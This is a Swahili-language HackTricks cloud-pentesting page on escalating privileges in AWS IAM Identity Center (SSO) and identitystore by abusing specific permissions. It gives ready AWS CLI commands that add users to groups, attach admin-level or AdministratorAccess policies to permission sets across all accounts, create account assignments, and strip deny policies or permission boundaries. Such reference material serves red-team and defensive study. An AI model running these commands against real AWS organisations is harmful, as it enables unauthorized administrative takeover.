AWS - SSO & identitystore Privesc

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

AWS Identity Center / AWS SSO

Kwa taarifa zaidi kuhusu AWS Identity Center / AWS SSO angalia:

AWS - IAM, Identity Center & SSO Enum

warning

Kumbuka kwamba kwa default, ni watumiaji wenye ruhusa kutoka kwa Management Account tu watakaoweza kufikia na kudhibiti IAM Identity Center.
Watumiaji kutoka kwa akaunti nyingine wanaweza kuziwezesha tu ikiwa akaunti ni a Delegated Adminstrator.
Angalia nyaraka kwa maelezo zaidi.

Weka upya Nenosiri

Njia rahisi ya kupandisha hadhi katika matukio kama haya ni kupata ruhusa inayoruhusu kuweka upya nywila za watumiaji. Kwa bahati mbaya, inawezekana tu kutuma barua pepe kwa mtumiaji ili aweke upya nenosiri lake, hivyo utahitaji ufikiaji wa barua pepe ya mtumiaji.

identitystore:CreateGroupMembership

Kwa ruhusa hii inawezekana kumweka mtumiaji ndani ya kikundi ili yeye arithi ruhusa zote ambazo kikundi kina.

bash
aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji aliye na ruhusa hii anaweza kumpa mtumiaji aliye chini ya udhibiti wake ruhusa za ziada kwa Permission Set.

bash
# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

Mshambulizi mwenye ruhusa hii anaweza kutoa ruhusa za ziada kwa Permission Set ambayo imepewa user aliye chini ya udhibiti wake.

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

Mshambuliaji mwenye ruhusa hizi anaweza kuongeza ruhusa kwenye Permission Set iliyotolewa kwa mtumiaji aliye chini ya udhibiti wake.

warning

Ili kutumia vibaya ruhusa hizi katika kesi hii unahitaji kujua jina la customer managed policy ambalo lipo ndani ya akaunti zote ambazo zitaathiriwa.

bash
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

Mvamizi mwenye ruhusa hii anaweza kumpa mtumiaji aliye chini ya udhibiti wake Permission Set kwa account.

bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

Inarudisha cheti za muda mfupi za STS kwa jina la role fulani lililowekwa kwa mtumiaji.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

Hata hivyo, unahitaji access token ambayo sijui jinsi ya kuipata (TODO).

sso:DetachManagedPolicyFromPermissionSet

Mshambuliaji mwenye ruhusa hii anaweza kuondoa uhusiano kati ya AWS managed policy na permission set iliyobainishwa. Inawezekana kutoa ruhusa zaidi kwa detaching a managed policy (deny policy).

bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

Mshambulizi mwenye ruhusa hii anaweza kuondoa uhusiano kati ya sera inayosimamiwa na mteja kutoka kwenye seti ya ruhusa iliyotajwa. Inawezekana kutoa ruhusa zaidi kwa kuondoa sera iliyosimamiwa (sera ya kukataa).

bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

Mshambulizi aliye na ruhusa hii anaweza kuondoa ruhusa kutoka kwa inline policy ndani ya permission set. Inawezekana kuipa ruhusa zaidi kwa kuondoa inline policy (deny policy).

bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

Muvamizi mwenye ruhusa hii anaweza kuondoa Permission Boundary kutoka kwenye permission set. Inawezekana kumpa idhini zaidi kwa kuondoa vizuizi kwenye Permission Set vinavyowekwa na Permission Boundary.

bash
aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks